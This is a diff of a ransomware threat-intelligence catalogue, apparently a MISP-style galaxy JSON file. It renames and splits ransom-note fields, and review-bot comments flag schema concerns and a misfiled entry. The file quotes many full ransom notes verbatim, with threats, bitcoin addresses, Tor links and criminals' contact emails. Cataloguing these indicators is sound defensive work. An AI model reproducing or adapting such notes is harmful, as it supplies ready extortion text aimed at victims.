@@ -10262,7 +10438,7 @@ ".braincrypt" ], "payment-method": "Email", - "ransomnotes": [ + "ransomnotes-filenames": [ "!!! HOW TO DECRYPT FILES !!!.txt" ], "refs": [ @@ -10290,7 +10466,7 @@ ".no_more_ransom" ], "payment-method": "Email", - "ransomnotes": [ + "ransomnotes-filenames": [ "README.txt", "nomoreransom_note_original.txt" ], @@ -10345,7 +10521,7 @@ ], "payment-method": "Bitcoin", "price": "2", - "ransomnotes": [ + "ransomnotes-filenames": [ "DOSYALARINIZA ULAŞMAK İÇİN AÇINIZ.html" ], "refs": [ @@ -10363,7 +10539,7 @@ "umbrecrypt_ID_[VICTIMID]" ], "payment-method": "Email", - "ransomnotes": [ + "ransomnotes-filenames": [ "README_DECRYPT_UMBRE_ID_[victim_id].jpg", "README_DECRYPT_UMBRE_ID_[victim_id].txt", "default32643264.bmp", @@ -10382,7 +10558,7 @@ "meta": { "payment-method": "Website", "price": "0.18", - "ransomnotes": [ + "ransomnotes-filenames": [ "Files encrypted.txt" ], "refs": [ @@ -10404,7 +10580,7 @@ ], "payment-method": "Website", "price": "2.5", - "ransomnotes": [ + "ransomnotes-filenames": [ "READTHISNOW!!!.txt", "Hellothere.txt", "YOUGOTHACKED.TXT" @@ -10424,7 +10600,7 @@ ".CCCRRRPPP" ], "payment-method": "Website", - "ransomnotes": [ + "ransomnotes-filenames": [ "READ_ME_!.txt" ], "refs": [ @@ -10458,7 +10634,7 @@ ], "payment-method": "Bitcoin", "price": "0.438", - "ransomnotes": [ + "ransomnotes-filenames": [ "VAULT.txt", "xort.txt", "trun.txt", @@ -10508,7 +10684,7 @@ ], "payment-method": "Bitcoin", "price": "0.15 (100 $)", - "ransomnotes": [ + "ransomnotes-filenames": [ "ReadMe.txt" ], "refs": [ @@ -10550,7 +10726,7 @@ ], "payment-method": "Bitcoin", "price": "2.5 - 3", - "ransomnotes": [ + "ransomnotes-filenames": [ "How to decrypt your data.txt" ], "refs": [ @@ -10574,7 +10750,7 @@ ], "payment-method": "Bitcoin", "price": "299 $", - "ransomnotes": [ + "ransomnotes-filenames": [ "HOW_TO_UNLOCK_FILES_README_().txt" ], "refs": [ 
@@ -10605,8 +10781,10 @@ ], "payment-method": "Bitcoin", "price": "0.8", - "ransomnotes": [ - "HOW TO DECRYPT FILES.TXT", + "ransomnotes-filenames": [ + "HOW TO DECRYPT FILES.TXT" + ], + "ransomnotes-refs": [ "https://pbs.twimg.com/media/Dfj9G_2XkAE0ZS2.jpg", "https://pbs.twimg.com/media/Dfj9H66WkAEHazN.jpg" ], @@ -10672,7 +10850,7 @@ ], "payment-method": "Bitcoin", "price": "3", - "ransomnotes": [ + "ransomnotes-filenames": [ "how.txt" ], "refs": [ @@ -10721,7 +10899,7 @@ ], "payment-method": "Bitcoin", "price": "1", - "ransomnotes": [ + "ransomnotes-filenames": [ "Take_Seriously (Your saving grace).txt" ], "refs": [ @@ -10790,7 +10968,7 @@ ], "payment-method": "Bitcoin", "price": "1.82 - 2.036", - "ransomnotes": [ + "ransomnotes-filenames": [ "WallpapeR.bmp", "ReadMe.bmp", "ReadMe.html", @@ -10823,7 +11001,7 @@ ], "payment-method": "Bitcoin", "price": "0.122", - "ransomnotes": [ + "ransomnotes-filenames": [ "DECODE_FILES.txt" ], "refs": [ @@ -10841,7 +11019,7 @@ ".pr0tect" ], "payment-method": "Email", - "ransomnotes": [ + "ransomnotes-refs": [ "http://blog.trendmicro.com/trendlabs-security-intelligence/files/2017/06/SOREBRECT-3.jpg" ], "refs": [ @@ -10859,7 +11037,7 @@ ], "payment-method": "PaySafeCard", "price": "50 €", - "ransomnotes": [ + "ransomnotes-refs": [ "https://www.bleepstatic.com/images/news/columns/week-in-ransomware/2017/august/25/DHvA8CDWAAIR5er.jpg" ], "refs": [ @@ -10877,7 +11055,7 @@ ".OXR" ], "payment-method": "Bitcoin Email", - "ransomnotes": [ + "ransomnotes-refs": [ "https://www.bleepstatic.com/images/news/columns/week-in-ransomware/2017/august/25/DHvDae7XoAE9usO[1].jpg" ], "refs": [ @@ -10895,7 +11073,7 @@ ], "payment-method": "Bitcoin", "price": "0.5", - "ransomnotes": [ + "ransomnotes-refs": [ "https://www.bleepstatic.com/images/news/columns/week-in-ransomware/2017/august/25/DHvM552WsAAuDbi[1].jpg" ], "refs": [ 
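Review bot: `ransomnotes-refs` first appears in `@@ -10605` and in the SOREBRECT and following hunks replaces `ransomnotes` outright for entries that only held a screenshot URL, which is the right split. If this galaxy's meta keys are validated against a schema elsewhere in the repository (not visible in this diff), that schema needs `ransomnotes-filenames` and `ransomnotes-refs` added or validation will reject the file. The `pbs.twimg.com` and `bleepstatic.com` links are third-party hosted screenshots and may rot; noting an archived copy alongside each would keep the note evidence reproducible.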
@@ -10928,7 +11106,7 @@
 ],
 "payment-method": "Bitcoin",
 "price": "250 $",
- "ransomnotes": [
+ "ransomnotes-refs": [
 "https://www.bleepstatic.com/images/news/columns/week-in-ransomware/2017/august/25/DH5KChhXsAADOIu[1].jpg"
 ],
 "refs": [
@@ -10944,7 +11122,7 @@
 "meta": {
 "payment-method": "Bitcoin",
 "price": "2 100 $",
- "ransomnotes": [
+ "ransomnotes-filenames": [
 "RESTORE_INFO-[id].txt"
 ],
 "refs": [
@@ -10976,7 +11154,7 @@
 ],
 "payment-method": "Bitcoin",
 "price": "0.1",
- "ransomnotes": [
+ "ransomnotes-filenames": [
 "readme.html",
 "readme.png"
 ],
@@ -11055,9 +11233,11 @@ "payment-method": "Bitcoin", "price": "0.2 - 0.4 - 2", "ransomnotes": [ - "_READ_ME_FOR_DECRYPT.txt", "Warning\n\nYour documents, photos,databases,important files have been encrypted by RSA-4096 and AES-256!\nIf you modify any file, it may cause make you cannot decrypt!!!\n\nDon't waste your precious time to try decrypt the files.\nIf there is no key that we provide to you , NO ONE can decrypt your precious files, even Jesus.\n\nHow to decrypt your files ?\n\nYou have to pay for decryption in bitcoin\nTo decrypt your files,please following the steps below\n\n1,Pay 2.0 bitcoin to this address: [bitcoin_address]\n\nPay To : [bitcoin_address]\nAmount : 2.0\n\n2,After you have finished paying,Contact us and Send us your Decrypt-ID via email\n\n3,Once we have confimed your deal,You can use the tool we sent to you to decrypt all your files.\n\nHow to obtain bitcoin ?\n\nThe easiest way to buy bitcoin is LocalBitcoins site.\nYou have to register, click Buy bitcoins and select the seller\nby payment method and price\n\nhttps://localbitcoins.com/buy_bitcoins\n\nhttps://paxful.com/buy-bitcoin\n\nhttp://bitcointalk.org/\n\n If you have any questions please do not hesitate to contact us\n\nContact Email:JeanRenoAParis@protonmail.com\n\nDecrypt-ID:" ], + "ransomnotes-filenames": [ + "_READ_ME_FOR_DECRYPT.txt" + ], "refs": [ "https://www.bleepingcomputer.com/news/security/storagecrypt-ransomware-infecting-nas-devices-using-sambacry/", "https://id-ransomware.blogspot.com/2017/11/storagecrypter.html" 
@@ -11075,9 +11255,11 @@ "payment-method": "Bitcoin", "price": "500 - 700 $", "ransomnotes": [ - "RECOVERY.txt", "ALL YOUR FILES WERE ENCRYPTED.\nTO RESTORE THIS FILE, YOU MUST SEND $700 BTC for MASCHINE\nOR $5,000 BTC FOR ALL NETWORK\nADDRESS: 15aM71TGtRZRrY97vdGcDEZeJYBWZhf4FP\nAFTER PAYMENT SENT EMAIL m4zn0v@keemail.me\nALONG WITH YOUR IDENTITY: VVNFUi1QQzA5\nNOT TO TURN OFF YOUR COMPUTER, UNLESS IT WILL BREAK" ], + "ransomnotes-filenames": [ + "RECOVERY.txt" + ], "refs": [ "https://www.bleepingcomputer.com/news/security/hc7-gotya-ransomware-installed-via-remote-desktop-services-spread-with-psexec/", "https://id-ransomware.blogspot.com/2017/12/hc7-ransomware.html" 
@@ -11139,21 +11321,25 @@ ], "payment-method": "Bitcoin Email", "ransomnotes": [ + "Attention: if you do not have money then you do not need to write to us!\nThe file is encrypted with the RSA-2048 algorithm, only we can decrypt the file.\n====================================================================================================\n fastrecovery@airmail.cc\n====================================================================================================\nYour files are encrypted!\nYour personal identifier:\n[redacted hex]\n====================================================================================================\nTo decrypt files, please contact us by email:\nfastrecovery@airmail.cc\n====================================================================================================\nThe file is encrypted with the RSA-2048 algorithm, only we can decrypt the file.\nAttention: if you do not have money then you do not need to write to us!", + "Your files are now encrypted!\n\nYour personal identifier:\n[redacted hex]\n\nAll your files have been encrypted due to a security problem with your PC.\n\nNow you should send us email with your personal identifier.\nThis email will be as confirmation you are ready to pay for decryption key.\nYou have to pay for decryption in Bitcoins. The price depends on how fast you write to us.\nAfter payment we will send you the decryption tool that will decrypt all your files.\n\nContact us using this email address: mr.leen@protonmail.com\n\nFree decryption as guarantee!\nBefore paying you can send us up to 3 files for free decryption.\nThe total size of files must be less than 10Mb (non archived), and files should not contain\nvaluable information (databases, backups, large excel sheets, etc.).\n\nHow to obtain Bitcoins?\n * The easiest way to buy bitcoins is LocalBitcoins site. 
You have to register, click\n 'Buy bitcoins', and select the seller by payment method and price:\n https://localbitcoins.com/buy_bitcoins\n * Also you can find other places to buy Bitcoins and beginners guide here:\n http://www.coindesk.com/information/how-can-i-buy-bitcoins\n\nAttention! \n * Do not rename encrypted files.\n * Do not try to decrypt your data using third party software, it may cause permanent data loss.\n * Decryption of your files with the help of third parties may cause increased price\n (they add their fee to our) or you can become a victim of a scam.", + "Attention, all your files are encrypted with the AES cbc-128 algorithm!\n \nIt's not a virus like WannaCry and others, I hacked your computer,\nThe encryption key and bitcoin wallet are unique to your computer,\nso you are guaranteed to be able to return your files.\n \nBut before you pay, you can make sure that I can really decrypt any of your files.\n \nTo do this, send me several encrypted files to cyrill.fedor0v@yandex.com, a maximum of 5 megabytes each, I will decrypt them\nand I will send you back. No more than 5 files. Do not forget to send in the letter bitcoin address 1BhHZxek7iUTm1mdrgax6yVrPzViqLhr9u from this file.\n \nAfter that, pay the decryption in the amount of 500$ to the bitcoin address: 1BhHZxek7iUTm1mdrgax6yVrPzViqLhr9u\nAfter payment, send me a letter to cyrill.fedor0v@yandex.com with payment notification.\nOnce payment is confirmed, I will send you a decryption program.\n \nYou can pay bitcoins online in many ways:\nhttps://buy.blockexplorer.com/ - payment by bank card\nhttps://www.buybitcoinworldwide.com/\nhttps://localbitcoins.net\n \nAbout Bitcoins:\nhttps://en.wikipedia.org/wiki/Bitcoin\n\n If you have any questions, write to me at cyrill.fedor0v@yandex.com\n \nAs a bonus, I will tell you how hacked your computer is and how to protect it in the future." 
+ ], + "ransomnotes-filenames": [ "IF YOU WANT TO GET ALL YOUR FILES BACK, PLEASE READ THIS.TXT", "HOW TO RECOVER ENCRYPTED FILES-fastrecovery@airmail.cc.TXT", "HOW TO RECOVER ENCRYPTED FILES.TXT", - "Attention: if you do not have money then you do not need to write to us!\nThe file is encrypted with the RSA-2048 algorithm, only we can decrypt the file.\n====================================================================================================\n fastrecovery@airmail.cc\n====================================================================================================\nYour files are encrypted!\nYour personal identifier:\n[redacted hex]\n====================================================================================================\nTo decrypt files, please contact us by email:\nfastrecovery@airmail.cc\n====================================================================================================\nThe file is encrypted with the RSA-2048 algorithm, only we can decrypt the file.\nAttention: if you do not have money then you do not need to write to us!", "INSTRUCTIONS FOR RESTORING FILES.TXT", - "Your files are now encrypted!\n\nYour personal identifier:\n[redacted hex]\n\nAll your files have been encrypted due to a security problem with your PC.\n\nNow you should send us email with your personal identifier.\nThis email will be as confirmation you are ready to pay for decryption key.\nYou have to pay for decryption in Bitcoins. 
The price depends on how fast you write to us.\nAfter payment we will send you the decryption tool that will decrypt all your files.\n\nContact us using this email address: mr.leen@protonmail.com\n\nFree decryption as guarantee!\nBefore paying you can send us up to 3 files for free decryption.\nThe total size of files must be less than 10Mb (non archived), and files should not contain\nvaluable information (databases, backups, large excel sheets, etc.).\n\nHow to obtain Bitcoins?\n * The easiest way to buy bitcoins is LocalBitcoins site. You have to register, click\n 'Buy bitcoins', and select the seller by payment method and price:\n https://localbitcoins.com/buy_bitcoins\n * Also you can find other places to buy Bitcoins and beginners guide here:\n http://www.coindesk.com/information/how-can-i-buy-bitcoins\n\nAttention! \n * Do not rename encrypted files.\n * Do not try to decrypt your data using third party software, it may cause permanent data loss.\n * Decryption of your files with the help of third parties may cause increased price\n (they add their fee to our) or you can become a victim of a scam.", "!!!ReadMeToDecrypt.txt", - "Attention, all your files are encrypted with the AES cbc-128 algorithm!\n \nIt's not a virus like WannaCry and others, I hacked your computer,\nThe encryption key and bitcoin wallet are unique to your computer,\nso you are guaranteed to be able to return your files.\n \nBut before you pay, you can make sure that I can really decrypt any of your files.\n \nTo do this, send me several encrypted files to cyrill.fedor0v@yandex.com, a maximum of 5 megabytes each, I will decrypt them\nand I will send you back. No more than 5 files. 
Do not forget to send in the letter bitcoin address 1BhHZxek7iUTm1mdrgax6yVrPzViqLhr9u from this file.\n \nAfter that, pay the decryption in the amount of 500$ to the bitcoin address: 1BhHZxek7iUTm1mdrgax6yVrPzViqLhr9u\nAfter payment, send me a letter to cyrill.fedor0v@yandex.com with payment notification.\nOnce payment is confirmed, I will send you a decryption program.\n \nYou can pay bitcoins online in many ways:\nhttps://buy.blockexplorer.com/ - payment by bank card\nhttps://www.buybitcoinworldwide.com/\nhttps://localbitcoins.net\n \nAbout Bitcoins:\nhttps://en.wikipedia.org/wiki/Bitcoin\n\n If you have any questions, write to me at cyrill.fedor0v@yandex.com\n \nAs a bonus, I will tell you how hacked your computer is and how to protect it in the future.", + "_How to restore files.TXT", + "How to restore encrypted files.txt" + ], + "ransomnotes-refs": [ "https://www.bleepstatic.com/images/news/columns/week-in-ransomware/2018/september/14/Scarab-ransomware.jpg", "https://www.bleepstatic.com/images/news/columns/week-in-ransomware/2018/november/23/DsnFZrGX4AE2H1c[1].jpg", - "_How to restore files.TXT", "https://www.bleepstatic.com/images/news/columns/week-in-ransomware/2018/november/30/Ds8PMFpW0AIcYuJ[1].jpg", "https://www.bleepstatic.com/images/news/columns/week-in-ransomware/2018/december/7/DtzAAIAW0AEHC86[1].jpg", - "https://pbs.twimg.com/media/DuC07vPWkAAMekP.jpg", - "How to restore encrypted files.txt" + "https://pbs.twimg.com/media/DuC07vPWkAAMekP.jpg" ], "refs": [ "https://www.bleepingcomputer.com/news/security/scarab-ransomware-pushed-via-massive-spam-campaign/", 
@@ -11183,9 +11369,11 @@ "payment-method": "Bitcoin", "price": "0.00725", "ransomnotes": [ - "HOW TO DECRYPT FILES.url", "As you may have already noticed, all your important files are encrypted and you no longer have access to them. A unique key has been generated specifically for this PC and two very strong encryption algorithm was applied in that process. Original content of your files are wiped and overwritten with encrypted data so it cannot be recovered using any conventional data recovery tool.\n\nThe good news is that there is still a chance to recover your files, you just need to have the right key.\n\nTo obtain the key, visit our website from the menu above. You have to be fast, after 96 hours the key will be blocked and all your files will remain permanently encrypted since no one will be able to recover them without the key!\n\nRemember, do not try anything stupid, the program has several security measures to delete all your files and cause the damage to your PC.\n\nTo avoid any misunderstanding, please read Help section." ], + "ransomnotes-filenames": [ + "HOW TO DECRYPT FILES.url" + ], "refs": [ "https://www.bleepingcomputer.com/news/security/file-spider-ransomware-targeting-the-balkans-with-malspam/", "http://id-ransomware.blogspot.com/2017/12/file-spider-ransomware.html" 
@@ -11260,13 +11448,17 @@ "payment-method": "Dash", "price": "1 - 3", "ransomnotes": [ - "GDCB-DECRYPT.txt", - "CRAB-Decrypt.txt", - "https://www.bleepstatic.com/images/news/ransomware/g/gandcrab/v3/desktop-background.jpg", "---= GANDCRAB =---\n\nAttention!\nAll your files documents, photos, databases and other important files are encrypted and have the extension: .GDCB \nThe only method of recovering files is to purchase a private key. It is on our server and only we can recover your files.\nThe server with your key is in a closed network TOR. You can get there by the following ways:\n1. Download Tor browser - https://www.torproject.org/\n2. Install Tor browser\n3. Open Tor Browser\n4. Open link in tor browser:http://gdcbghvjyqy7jclk.onion/[id]\n5. Follow the instructions on this page\n\nIf Tor/Tor browser is locked in your country or you can not install it, open one of the following links in your regular browser:\n1. http://gdcbghvjyqy7jclk.onion.top/[id]\n2. http://gdcbghvjyqy7jclk.onion.casa/[id]\n3. http://gdcbghvjyqy7jclk.onion.guide/[id]\n4. http://gdcbghvjyqy7jclk.onion.rip/[id]\n5. http://gdcbghvjyqy7jclk.onion.plus/[id]\n\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free.\n\nDANGEROUS!\nDo not try to modify files or use your own private key - this will result in the loss of your data forever!", "---= GANDCRAB =---\nAttention!\nAll your files documents, photos, databases and other important files are encrypted and have the extension: .GDCB\nThe only method of recovering files is to purchase a private key. It is on our server and only we can recover your files.\nThe server with your key is in a closed network TOR. You can get there by the following ways:\n1. Download Tor browser - https://www.torproject.org/\n2. Install Tor browser\n3. Open Tor Browser\n4. Open link in tor browser: http://gdcbmuveqjsli57x.onion/[id]\n5. 
Follow the instructions on this page\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free.\nIf you can't download TOR and use it, or in your country TOR blocked, read it:\n1. Visit https://tox.chat/download.html\n2. Download and install qTOX on your PC.\n3. Open it, click \"New Profile\" and create profile.\n4. Search our contact - 6C5AD4057E594E090E0C987B3089F74335DA75F04B7403E0575663C26134956917D193B195A5\n5. In message please write your ID and wait our answer: 6361f798c4ba3647\nDANGEROUS!\nDo not try to modify files or use your own private key - this will result in the loss of your data forever!", "ENCRYPTED BY GANDCRAB 3\n\nDEAR [user_name],\n\nYOUR FILES ARE UNDER STRONG PROTECTION BY OUR SOFTWARE. IN ORDER TO RESTORE IT YOU MUST BUY DECRYPTOR\n\nFor further steps read CRAB-DECRYPT.txt that is located in every encrypted folder.", - " ---= GANDCRAB V3 =--- \n\nAttention! \n\nAll your files documents, photos, databases and other important files are encrypted and have the extension: .CRAB \n\nThe only method of recovering files is to purchase a private key. It is on our server and only we can recover your files. \n\n\nThe server with your key is in a closed network TOR. You can get there by the following ways: \n\n0. Download Tor browser - https://www.torproject.org/ \n\n1. Install Tor browser \n\n2. Open Tor Browser \n\n3. Open link in TOR browser: http://gandcrab2pie73et.onion/[id] \n\n4. Follow the instructions on this page \n\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \n\n\nThe alternative way to contact us is to use Jabber messanger. Read how to:\n0. Download Psi-Plus Jabber Client: https://psi-im.org/download/\n1. Register new account: http://sj.ms/register.php\n0) Enter \"username\": [id]\n1) Enter \"password\": your password\n2. Add new account in Psi\n3. Add and write Jabber ID: ransomware@sj.ms any message\n4. 
Follow instruction bot \n\nATTENTION!\nIt is a bot! It's fully automated artificial system without human control!\nTo contact us use TOR links. We can provide you all required proofs of decryption availibility anytime. We are open to conversations.\nYou can read instructions how to install and use jabber here http://www.sfu.ca/jabber/Psi_Jabber_PC.pdf \n\nCAUGHTION! \n\nDo not try to modify files or use your own private key. This will result in the loss of your data forever! ", + " ---= GANDCRAB V3 =--- \n\nAttention! \n\nAll your files documents, photos, databases and other important files are encrypted and have the extension: .CRAB \n\nThe only method of recovering files is to purchase a private key. It is on our server and only we can recover your files. \n\n\nThe server with your key is in a closed network TOR. You can get there by the following ways: \n\n0. Download Tor browser - https://www.torproject.org/ \n\n1. Install Tor browser \n\n2. Open Tor Browser \n\n3. Open link in TOR browser: http://gandcrab2pie73et.onion/[id] \n\n4. Follow the instructions on this page \n\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \n\n\nThe alternative way to contact us is to use Jabber messanger. Read how to:\n0. Download Psi-Plus Jabber Client: https://psi-im.org/download/\n1. Register new account: http://sj.ms/register.php\n0) Enter \"username\": [id]\n1) Enter \"password\": your password\n2. Add new account in Psi\n3. Add and write Jabber ID: ransomware@sj.ms any message\n4. Follow instruction bot \n\nATTENTION!\nIt is a bot! It's fully automated artificial system without human control!\nTo contact us use TOR links. We can provide you all required proofs of decryption availibility anytime. We are open to conversations.\nYou can read instructions how to install and use jabber here http://www.sfu.ca/jabber/Psi_Jabber_PC.pdf \n\nCAUGHTION! \n\nDo not try to modify files or use your own private key. 
This will result in the loss of your data forever! " + ], + "ransomnotes-filenames": [ + "GDCB-DECRYPT.txt", + "CRAB-Decrypt.txt" + ], + "ransomnotes-refs": [ + "https://www.bleepstatic.com/images/news/ransomware/g/gandcrab/v3/desktop-background.jpg", "https://www.bleepstatic.com/images/news/security/f/fallout-exploit-kit/gandcrab-fallout.jpg" ], "refs": [ 
@@ -11369,17 +11561,21 @@ "payment-method": "Bitcoin", "price": "750 $", "ransomnotes": [ - "How_return_files.txt", - "Image.jpg", "Hello... :)\nFor instructions on how to recovery the files, write to me:\njonskuper578@india.com\njonskuper578@gmx.de\njonskuper578@protonmail.com\nIn the letter, indicate your personal ID (see the file format).\nIf you have not received an answer, write to me again.", "WARNING!!!\nYour ID 83624883\nOUR FILES ARE DECRIPTED\nYour documents, photos, database, save games and other important data was encrypted.\nData recovery the necessary interpreter. To get the interpreter, should send an email to helppme@india.com or hepl1112@aol.com.\nIn a letter to include Your personal ID (see the beginning of this document).\nIn response to the letter You will receive the address of your Bitcoin wallet to which you want to perform the transfer.\nWhen money transfer is confirmed, You will receive the decrypter file for Your computer.\nAfter starting the programm-interpreter, all Your files will be restored.\nAttention! Do not attempt to remove a program or run the anti-virus tools.", - "Привет мой друг!\nВсе файлы на твоем ПК зашифрованы!\nМой email: helppme@india.com или\nhepl1112@aol.com", - "Hello my friend!\nAll files on your PC encryphted!\nmy email: helppme@india.com or\nhepl1112@aol.com", "ПРЕДУПРЕЖДЕНИЕ!!!\nВаш ID 83624883\nOUR FILES ARE DECRIPTED\nЗашифрованы ваши документы, фотографии, база данных, сохранения игр и другие важные данные.\nВосстановить данные нужен интерпретатор. Для получения интерпретатора надо отправить email на helppme@india.com или hepl1112@aol.com.\nВ письме укажите Ваш личный ID (см. начало этого документа).\nВ ответ на письмо Вы получите адрес вашего биткойн-кошелька, на который Вы хотите сделать перевод.\nКогда денежный перевод будет подтвержден, вы получите файл-декриптер для Вашего компьютера.\nПосле запуска программы-интерпретатора все Ваши файлы будут восстановлены.\nВнимание! 
Не пытайтесь удалить программу или запустить антивирусные программы.", - "https://4.bp.blogspot.com/-6jE-GW6wCr8/WQY1L_uHsFI/AAAAAAAAE-A/3YR0bwwBJqgp8CsApZq4F_44JkMB0m2WwCLcB/s320/image-note.jpg", - "https://2.bp.blogspot.com/-T4lvnNISc_A/WQY1SI1r1mI/AAAAAAAAE-E/tH7p02nS2LUTvXmq66poiyM1RYhHc4HbwCLcB/s200/lock-note.jpg", "Hello…\nFor instructions on how to recovery the files, write to me:\nvine77725@gmx.de\nvine77725@india.com\nvine77725@protonmail.com\nIn the letter, indicate your personal ID (see the file format).\nIf you have not received an answer, write to me again." ], + "ransomnotes-filenames": [ + "How_return_files.txt", + "Image.jpg", + "Привет мой друг!\nВсе файлы на твоем ПК зашифрованы!\nМой email: helppme@india.com или\nhepl1112@aol.com", + "Hello my friend!\nAll files on your PC encryphted!\nmy email: helppme@india.com or\nhepl1112@aol.com" + ], + "ransomnotes-refs": [ + "https://4.bp.blogspot.com/-6jE-GW6wCr8/WQY1L_uHsFI/AAAAAAAAE-A/3YR0bwwBJqgp8CsApZq4F_44JkMB0m2WwCLcB/s320/image-note.jpg", + "https://2.bp.blogspot.com/-T4lvnNISc_A/WQY1SI1r1mI/AAAAAAAAE-E/tH7p02nS2LUTvXmq66poiyM1RYhHc4HbwCLcB/s200/lock-note.jpg" + ], "refs": [ "https://www.securityweek.com/rsautil-ransomware-distributed-rdp-attacks", "https://www.bleepingcomputer.com/news/security/rsautil-ransomware-helppme-india-com-installed-via-hacked-remote-desktop-services/", @@ -11399,7 +11595,9 @@ "meta": { "payment-method": "Bitcoin", "ransomnotes": [ - "Your computer is encrypted . Mail cryz1@protonmail.com . Send your ID 5612.\nNote! You have only 72 hours for write on e-mail (see below) or all your files will be lost!", + "Your computer is encrypted . Mail cryz1@protonmail.com . Send your ID 5612.\nNote! You have only 72 hours for write on e-mail (see below) or all your files will be lost!" + ], + "ransomnotes-filenames": [ "README_DECRYPT.txt" ], "refs": [ 
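Review bot: The new `"ransomnotes-filenames"` array in this hunk receives the two note bodies `"Привет мой друг!\nВсе файлы на твоем ПК зашифрованы!..."` and `"Hello my friend!\nAll files on your PC encryphted!..."`, which are ransom note contents, not filenames; they were removed from `"ransomnotes"` on the old side and should stay there. Only `"How_return_files.txt"` and `"Image.jpg"` are filenames, so the new array should read `"ransomnotes-filenames": [ "How_return_files.txt", "Image.jpg" ],` with the two note texts re-added to `"ransomnotes"`. Otherwise any consumer that treats `"ransomnotes-filenames"` as file-name indicators (as the rest of this series does) will pick up multi-line note text as a filename. The enclosing cluster entry starts before the hunk.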
@@ -11414,9 +11612,11 @@
 "meta": {
 "payment-method": "Bitcoin Email (Tor)",
 "ransomnotes": [
- "Zenis-Instructions.html",
 "*** All your files has been encrypted ***\n\nI am ZENIS. A mischievous boy who loves cryptography, hardware and programming. My world is full of unanswered questions and puzzles half and half, and I'm coming to discover a new world. A world in digital space that you are supposed to play the role of my toys.\n\nIf you want to win in this game, you have to listen carefully to my instructions, otherwise you will be caught up in a one-step game and you will become the main loser of the story.\n\nMy instructions are simple and clear. Then follow these steps:\n\n1. Send this file (Zenis-Instructions.html) to my email with one your encrypted file less than 2 MB to trust to the game.\n\n2. I decrypt your file for free and send for you.\n\n3. If you confirm the correctness of the files, verify that the files are correct via email\n\n4. Then receive the price of decrypting files\n\n5. After you have deposited, please send me the payment details\n\n6. After i confirm deposit, i send you the \"Zenis Decryptor\" along with \"Private Key\" to recovery all your files.\n\nNow you can finish the game. You won the game. congratulations.\n\n\nPlease submit your request to both emails:\n\nTheZenis@Tutanota.com\n\nTheZenis@MailFence.com\n\nIf you did not receive an email after six hours, submit your request to the following emails:\n\nTheZenis@Protonmail.com\n\nTheZenis@Mail2Tor.com (On the TOR network)\n\n\nWarning: 3rd party and public programs, It may cause irreversible damage to your files. And your files will be lost forever."
 ],
+ "ransomnotes-filenames": [
+ "Zenis-Instructions.html"
+ ],
 "refs": [
 "https://www.bleepingcomputer.com/news/security/zenis-ransomware-encrypts-your-data-and-deletes-your-backups/",
 "https://id-ransomware.blogspot.com/2018/03/zenis-ransomware.html"
@@ -11445,9 +11645,11 @@ ], "payment-method": "Monero miner on the computer", "ransomnotes": [ - "HOW-TO-DECRYPT-FILES.txt", " ____ __ __ ____ __\n / __ ) / /____ _ _____ / /__ / __ \\ __ __ / /_ __ __\n / __ |/ // __ `// ___// //_/ / /_/ // / / // __ \\ / / / /\n / /_/ // // /_/ // /__ / ,< / _, _// /_/ // /_/ // /_/ /\n /_____//_/ \\__,_/ \\___//_/|_| /_/ |_| \\__,_//_.___/ \\__, /\n /____/\n\n===================== Identification Key =====================\n\n[id]\n\n===================== Identification Key =====================\n\n[Can not access your files?]\n\nCongratulations, you are now part of our family #BlackRuby Ransomware. The range of this family is wider and bigger every day.\nOur hosts welcome our presence because we will give them a scant souvenir from the heart of Earth.\n\nThis time, we are guest with a new souvenir called \"Black Ruby\". A ruby ​​in black, different, beautiful, and brilliant, which has been bothered to extract those years and you must also endure this hard work to keep it. If you do not have the patience of this difficulty or you hate some of this precious stone, we are willing to receive the price years of mining and finding rubies for your relief and other people of the world who are guests of the black ruby.\n\nSo let's talk a little bit with you without a metaphor and literary terms to understand the importance of the subject.\nIt does not matter if you're a small business or you manage a large organization, no matter whether you are a regular user or a committed employee, it's important that you have a black ruby and to get rid of it, you need to get back to previous situation and we need a next step.\n\nThe breadth of this family is not supposed to stop, because we have enough knowledge and you also trust our knowledge.\nWe are always your backers and guardian of your information at this multi-day banquet and be sure that no one in the world can take it from you except for us who extracts this precious stone. 
We need a two-sided cooperation in developing cybersecurity knowledge. The background to this cooperation is a mutual trust, which will result in peace and tranquility. you must pay $650 (USD) worth of Bitcoins for restore your system to the previous state and you are free to choose to stay in this situation or return to the normal.\n\nDo not forget that your opportunity is limited. From these limits you can create golden situations. Be sure we will help you in this way and to know that having a black ruby does not always mean riches. You and your system are poor, poor knowledge of cybersecurity and lack of security on your system!.\n\n ========================================================================================================================\n\n [HOW TO DECRYPT FILES]\n\n 1. Copy \"Identification Key\".\n 2. Send this key with two encrypted files (less than 5 MB) for trust us to email address \"TheBlackRuby@Protonmail.com\".\n 3. We decrypt your two files and send them to your email.\n 4. After ensuring the integrity of the files, you must pay $650 (USD) with bitcoin and send transaction code to our email, our bitcoin address is \"19S7k3zHphKiYr85T25FnqdxizHcgmjoj1\".\n 5. You get \"Black Ruby Decryptor\" Along with the private key of your system.\n 6. Everything returns to the normal and your files will bereleased.\n\n========================================================================================================================\n\n[What is encryption?]\n\nEncryption is a reversible modification of information for security reasons but providing full access to it for authorised users.\n To become an authorised user and keep the modification absolutely reversible (in other words to have a possibility to decrypt your files) you should have an \"Personal Identification Key\". But not only it. 
It is required also to have the special decryption software\n(in your case “Black Ruby Decryptor” software) for safe and complete decryption of all your files and data.\n\n[Everything is clear for me but what should I do?]\n\n The first step is reading these instructions to the end. Your files have been encrypted with the “Black Ruby Ransomware” software; the instructions (“HOW-TO-DECRYPT-FILES.txt”) in the folders with your encrypted files are not viruses, they will help you. After reading this text the most part of people start searching in the Internet the words the “Black Ruby Ransomware” where they find a lot of ideas, recommendation and instructions. It is necessary to realise that we are the ones who closed the lock on your files and we are the only ones who have this secret key to open them.\n\n[Have you got advice?]\n\n[*** Any attempts to get back you files with the third-party tools can be fatal for your encrypted files ***]\nThe most part of the tried-party software change data with the encrypted files to restore it but this cases damage to the files. \nFinally it will be impossible to decrypt your files. When you make a puzzle but some items are lost, broken or not put in its place - the puzzle items will never match, the same way the third-party software will ruin your files completely and irreversibly. You should realise that any intervention of the third-party software to restore files encrypted with the “Black Ruby Ransomware” software may be fatal for your files.\n\nIf you look through this text in the Internet and realise that something is wrong with your files but you do not have any instructions to restore your files, please contact your 